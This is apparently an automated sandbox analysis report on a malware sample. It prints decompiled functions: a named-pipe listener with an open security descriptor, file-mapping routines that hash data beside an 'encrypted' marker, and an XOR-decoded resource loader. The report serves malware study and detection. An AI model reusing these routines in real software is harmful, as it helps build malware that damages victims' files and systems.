                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_v28.nLength = 0xc;
                                                                                                                                                                                        				_v28.bInheritHandle = 0;
                                                                                                                                                                                        				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                                                        				_v28.lpSecurityDescriptor = _t25;
                                                                                                                                                                                        				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						L3:
                                                                                                                                                                                        						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                                                        						_v8 = _t30;
                                                                                                                                                                                        						if(_t30 == 0xffffffff) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L4:
                                                                                                                                                                                        						_t31 = ConnectNamedPipe(_t30, 0); // executed
                                                                                                                                                                                        						if(_t31 == 0) {
                                                                                                                                                                                        							L18:
                                                                                                                                                                                        							CloseHandle(_v8);
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                        							} while (_t30 == 0xffffffff);
                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t50 = 0x1e;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t50 = _t50 - 1;
                                                                                                                                                                                        								_v12 = 0;
                                                                                                                                                                                        								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
                                                                                                                                                                                        								if(_t34 == 0) {
                                                                                                                                                                                        									goto L9;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								if(_v12 != 0) {
                                                                                                                                                                                        									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        									if(_t51 != 0) {
                                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                                        										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
                                                                                                                                                                                        											_t44 = StrChrW(_t51, 0x3a);
                                                                                                                                                                                        											if(_t44 != 0) {
                                                                                                                                                                                        												 *_t44 = 0;
                                                                                                                                                                                        												E007B69AE(_t51,  &(_t44[1]), 2);
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										HeapFree(GetProcessHeap(), 0, _t51);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L17:
                                                                                                                                                                                        									FlushFileBuffers(_v8);
                                                                                                                                                                                        									DisconnectNamedPipe(_v8);
                                                                                                                                                                                        									goto L18;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								Sleep(0x3e8); // executed
                                                                                                                                                                                        								L9:
                                                                                                                                                                                        							} while (_t50 != 0);
                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L3:
                                                                                                                                                                                        						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                                                        						_v8 = _t30;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000014), ref: 007B7025
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B7028
                                                                                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007B703C
                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 007B7051
                                                                                                                                                                                        • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 007B706F
                                                                                                                                                                                        • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 007B707F
                                                                                                                                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007B709F
                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 007B70B3
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 007B70C4
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B70C7
                                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 007B70E2
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000000,0000003A), ref: 007B70F7
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7114
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B7117
                                                                                                                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 007B7120
                                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32(?), ref: 007B7129
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B7132
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 1225799970-1689521831
                                                                                                                                                                                        • Opcode ID: 8eb0d46dfafd9b88a4c69c0cdb6d19a87036c10c1103b54c486a6de84571502c
                                                                                                                                                                                        • Instruction ID: 9da75922b19fc5d921d3dbc6b8c01b89321d8ae61253f81afd94cf8d4a1cd36c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8eb0d46dfafd9b88a4c69c0cdb6d19a87036c10c1103b54c486a6de84571502c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 53414B71A0021CBBDB256BA9DC4AFEFBF39EF85750F104515F605E60A0D7788E40DAA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                        			E007B5BC4(void* __eflags, void* _a4, intOrPtr _a8, char _a16) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                        				struct _SYSTEM_INFO _v56;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                        				long _t52;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				long _t62;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t63 = 8;
                                                                                                                                                                                        				_v56.dwOemId = 0;
                                                                                                                                                                                        				memset( &(_v56.dwPageSize), 0, _t63 << 2);
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				GetSystemInfo( &_v56);
                                                                                                                                                                                        				_t6 =  &_a16; // 0x7b5e4c
                                                                                                                                                                                        				_t80 =  *((intOrPtr*)( *_t6 + 0x44)) + 0x16;
                                                                                                                                                                                        				_t76 = _a8 - _t80;
                                                                                                                                                                                        				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                                                        				asm("adc edx, [ebp+0x10]");
                                                                                                                                                                                        				asm("sbb edx, eax");
                                                                                                                                                                                        				_a8 = _t76;
                                                                                                                                                                                        				_t43 = E007BA6B0(_v56.dwAllocationGranularity + _t76 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                                                        				asm("sbb edx, 0x0");
                                                                                                                                                                                        				_t45 = E007BA670(_t43 - 1, 0, _v56.dwAllocationGranularity, 0);
                                                                                                                                                                                        				_t77 = _t76 - _t45;
                                                                                                                                                                                        				_t62 = _t77 + _t80;
                                                                                                                                                                                        				_t46 = MapViewOfFile(_a4, 6, 0, _t45, _t62); // executed
                                                                                                                                                                                        				_t81 = _t46;
                                                                                                                                                                                        				_v8 = _t81;
                                                                                                                                                                                        				if(_t81 != 0) {
                                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                                        					_t16 =  &_a16; // 0x7b5e4c
                                                                                                                                                                                        					_t49 =  *_t16;
                                                                                                                                                                                        					__imp__CryptDuplicateHash( *((intOrPtr*)(_t49 + 0x40)), 0, 0,  &_a4); // executed
                                                                                                                                                                                        					if(_t49 != 0) {
                                                                                                                                                                                        						_t82 = _t81 + _t77;
                                                                                                                                                                                        						__imp__CryptHashData(_a4, _t82, 4, 0);
                                                                                                                                                                                        						if(_t49 != 0) {
                                                                                                                                                                                        							_t19 =  &_a16; // 0x7b5e4c
                                                                                                                                                                                        							_t52 =  *( *_t19 + 0x44);
                                                                                                                                                                                        							_v12 = _t52;
                                                                                                                                                                                        							_t53 = LocalAlloc(0x40, _t52);
                                                                                                                                                                                        							_v16 = _t53;
                                                                                                                                                                                        							if(_t53 != 0) {
                                                                                                                                                                                        								__imp__CryptGetHashParam(_a4, 2, _t53,  &_v12, 0);
                                                                                                                                                                                        								if(_t53 != 0) {
                                                                                                                                                                                        									memcpy(_t82 + 4, _v16, _v12);
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsw");
                                                                                                                                                                                        									_v20 = FlushViewOfFile(_v8, _t62);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								LocalFree(_v16);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__imp__CryptDestroyHash(_a4);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					UnmapViewOfFile(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,007B5E4C,?,?,00000000), ref: 007B5BE3
                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5C14
                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C39
                                                                                                                                                                                        • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C5D
                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C75
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C8B
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CA4
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B5CB8
                                                                                                                                                                                        • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,007B5E4C,?,?), ref: 007B5CDC
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CE8
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CF1
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CFA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                                                                                                                                        • String ID: L^{$encrypted
                                                                                                                                                                                        • API String ID: 3326259677-3620586752
                                                                                                                                                                                        • Opcode ID: 4f18f01f9efdd4d3352e70d88adb91e1aef3ab5df5297476e05813f319440778
                                                                                                                                                                                        • Instruction ID: d74a0c6c3954445b35621174624eac688503a53738d58728d7f9e5e6edbf2143
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f18f01f9efdd4d3352e70d88adb91e1aef3ab5df5297476e05813f319440778
                                                                                                                                                                                        • Instruction Fuzzy Hash: B04118B1A00209BFDB11DF68DD48FEE7BBAFB44340F058124F905A6250EB759E148BA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 532 7b8313-7b8334 FindResourceW 533 7b833a-7b8349 LoadResource 532->533 534 7b8415-7b841a 532->534 533->534 535 7b834f-7b835b LockResource 533->535 535->534 536 7b8361-7b8373 SizeofResource 535->536 536->534 537 7b8379-7b8393 GetProcessHeap RtlAllocateHeap 536->537 538 7b8413-7b8414 537->538 539 7b8395-7b83a9 memcpy 537->539 538->534 540 7b83ab 539->540 541 7b83b5-7b83c5 GetProcessHeap RtlAllocateHeap 539->541 544 7b83ad-7b83b1 540->544 542 7b8407-7b840c GetProcessHeap 541->542 543 7b83c7-7b83dc call 7ba790 541->543 542->538 547 7b83e1-7b83e3 543->547 544->544 545 7b83b3 544->545 545->541 548 7b83fa-7b8400 GetProcessHeap 547->548 549 7b83e5-7b83ea 547->549 548->542 550 7b83ec-7b83ef 549->550 551 7b83f1-7b83f8 549->551 550->551 551->542
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B8313(signed int __eax, void _a4, void* _a8) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				void** _t39;
                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				struct HRSRC__* _t50;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        				_t50 = FindResourceW( *0x7c7b98, __eax & 0x0000ffff, 6);
                                                                                                                                                                                        				if(_t50 == 0) {
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        					return _v12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t21 = LoadResource( *0x7c7b98, _t50);
                                                                                                                                                                                        				if(_t21 == 0) {
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t22 = LockResource(_t21);
                                                                                                                                                                                        				_v16 = _t22;
                                                                                                                                                                                        				if(_t22 == 0) {
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t23 = SizeofResource( *0x7c7b98, _t50);
                                                                                                                                                                                        				_v8 = _t23;
                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t25 = RtlAllocateHeap(GetProcessHeap(), 0, _t23); // executed
                                                                                                                                                                                        				_t48 = _t25;
                                                                                                                                                                                        				if(_t48 == 0) {
                                                                                                                                                                                        					L16:
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				memcpy(_t48, _v16, _v8);
                                                                                                                                                                                        				_t27 = _v8;
                                                                                                                                                                                        				if(_t27 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					_t29 = RtlAllocateHeap(GetProcessHeap(), 8,  *_t48); // executed
                                                                                                                                                                                        					_t39 = _a4;
                                                                                                                                                                                        					 *_t39 = _t29;
                                                                                                                                                                                        					if(_t29 != 0) {
                                                                                                                                                                                        						_a4 =  *_t48;
                                                                                                                                                                                        						_t11 = _t48 + 4; // 0x4
                                                                                                                                                                                        						_t32 = E007BA790(_t29,  &_a4, _t11, _v8 + 0xfffffffc); // executed
                                                                                                                                                                                        						if(_t32 != 0) {
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 0,  *_t39);
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t35 = _a8;
                                                                                                                                                                                        							if(_t35 != 0) {
                                                                                                                                                                                        								 *_t35 = _a4;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_v12 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					RtlFreeHeap(GetProcessHeap(), 0, _t48); // executed
                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t46 =  *_t48;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t46 = _t46 ^ 0x000000e9;
                                                                                                                                                                                        					_t27 = _t27 - 1;
                                                                                                                                                                                        				} while (_t27 != 0);
                                                                                                                                                                                        				 *_t48 = _t46;
                                                                                                                                                                                        				goto L9;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
                                                                                                                                                                                        • LoadResource.KERNEL32(00000000), ref: 007B8341
                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 007B8350
                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000), ref: 007B8368
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B839C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 007B83FE
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 007B8401
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                                                                                                                                        • String ID: Uet0Xet
                                                                                                                                                                                        • API String ID: 3010137425-1689521831
                                                                                                                                                                                        • Opcode ID: 130189d95e511908d4b7f774bff9cc855829c0a42928c07b8486028841a7cc81
                                                                                                                                                                                        • Instruction ID: db886541ff6854286e83f25cb361f72f5317bb27e0a662045a994212f8435f1f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 130189d95e511908d4b7f774bff9cc855829c0a42928c07b8486028841a7cc81
                                                                                                                                                                                        • Instruction Fuzzy Hash: CC31387190024AABCB219FA9DC48FEE7FACEF44354F108124F91597290EF38C910CB65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                        			E007B5A73(void* __eflags, void* _a4, intOrPtr _a8, long _a16, signed int* _a20, char _a24) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				struct _SYSTEM_INFO _v48;
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				long _t47;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                        				void** _t53;
                                                                                                                                                                                        				long _t54;
                                                                                                                                                                                        				long* _t56;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				long _t78;
                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                        				long* _t103;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t64 = 8;
                                                                                                                                                                                        				_v48.dwOemId = 0;
                                                                                                                                                                                        				memset( &(_v48.dwPageSize), 0, _t64 << 2);
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				GetSystemInfo( &_v48); // executed
                                                                                                                                                                                        				_t88 =  *(_a16 + 0x44) + 0x16;
                                                                                                                                                                                        				_t82 = _a8 - _t88;
                                                                                                                                                                                        				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                                                        				_t61 = _v48.dwAllocationGranularity;
                                                                                                                                                                                        				asm("adc edx, [ebp+0x10]");
                                                                                                                                                                                        				asm("sbb edx, eax");
                                                                                                                                                                                        				_a8 = _t82;
                                                                                                                                                                                        				_t45 = E007BA6B0(_v48.dwAllocationGranularity + _t82 - 1, 0, _v48.dwAllocationGranularity, 0);
                                                                                                                                                                                        				asm("sbb edx, 0x0");
                                                                                                                                                                                        				_t47 = E007BA670(_t45 - 1, 0, _t61, 0);
                                                                                                                                                                                        				_t62 = _t82 - _t47;
                                                                                                                                                                                        				_t48 = MapViewOfFile(_a4, 4, 0, _t47, _t62 + _t88); // executed
                                                                                                                                                                                        				_v12 = _t48;
                                                                                                                                                                                        				_t98 = _t48;
                                                                                                                                                                                        				if(_t98 != 0) {
                                                                                                                                                                                        					_t78 = _a16;
                                                                                                                                                                                        					_push(9);
                                                                                                                                                                                        					asm("repe cmpsw");
                                                                                                                                                                                        					_t51 = 0 | _t98 == 0x00000000;
                                                                                                                                                                                        					 *_a20 = _t51;
                                                                                                                                                                                        					if(_t51 == 0) {
                                                                                                                                                                                        						_v8 = 1;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t53 =  &_a4;
                                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                                        						__imp__CryptDuplicateHash( *((intOrPtr*)(_t78 + 0x40)), 0, 0, _t53);
                                                                                                                                                                                        						if(_t53 != 0) {
                                                                                                                                                                                        							__imp__CryptHashData(_a4, _v12 + _t62, 4, 0);
                                                                                                                                                                                        							if(_t53 != 0) {
                                                                                                                                                                                        								_t54 =  *(_a16 + 0x44);
                                                                                                                                                                                        								_a16 = _t54;
                                                                                                                                                                                        								_t63 = LocalAlloc(0x40, _t54);
                                                                                                                                                                                        								if(_t63 != 0) {
                                                                                                                                                                                        									_t56 =  &_a16;
                                                                                                                                                                                        									__imp__CryptGetHashParam(_a4, 2, _t63, _t56, 0);
                                                                                                                                                                                        									_v8 = _t56;
                                                                                                                                                                                        									_t103 = _t56;
                                                                                                                                                                                        									if(_t103 != 0) {
                                                                                                                                                                                        										asm("repe cmpsb");
                                                                                                                                                                                        										_t33 =  &_a24; // 0x7b5de8
                                                                                                                                                                                        										 *( *_t33) = 0 | _t103 == 0x00000000;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									LocalFree(_t63);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__imp__CryptDestroyHash(_a4);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					UnmapViewOfFile(_v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,007B5DE8,00000000,?,?,?,00000010,?), ref: 007B5A92
                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5AC3
                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5AEA
                                                                                                                                                                                        • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B32
                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B49
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B5F
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B77
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B99
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5BA2
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5BB4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                        • String ID: encrypted$]{
                                                                                                                                                                                        • API String ID: 569730286-3574831567
                                                                                                                                                                                        • Opcode ID: cefcb4c360266fafb1fc9dc82a1056085de3850f0672dbd24ec3cb5090cc0346
                                                                                                                                                                                        • Instruction ID: 55dc93924d61dda8edc9997ce53c16108d72aa2e099073191d5d81f40fb43c66
                                                                                                                                                                                        • Opcode Fuzzy Hash: cefcb4c360266fafb1fc9dc82a1056085de3850f0672dbd24ec3cb5090cc0346
                                                                                                                                                                                        • Instruction Fuzzy Hash: 95414FB2600209AFDB149F78DC44FAA3BA9EB44354F058128FD05E7250EB75ED05CBA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B2054(intOrPtr _a4, void* _a8, short* _a12, intOrPtr* _a16, intOrPtr _a20) {
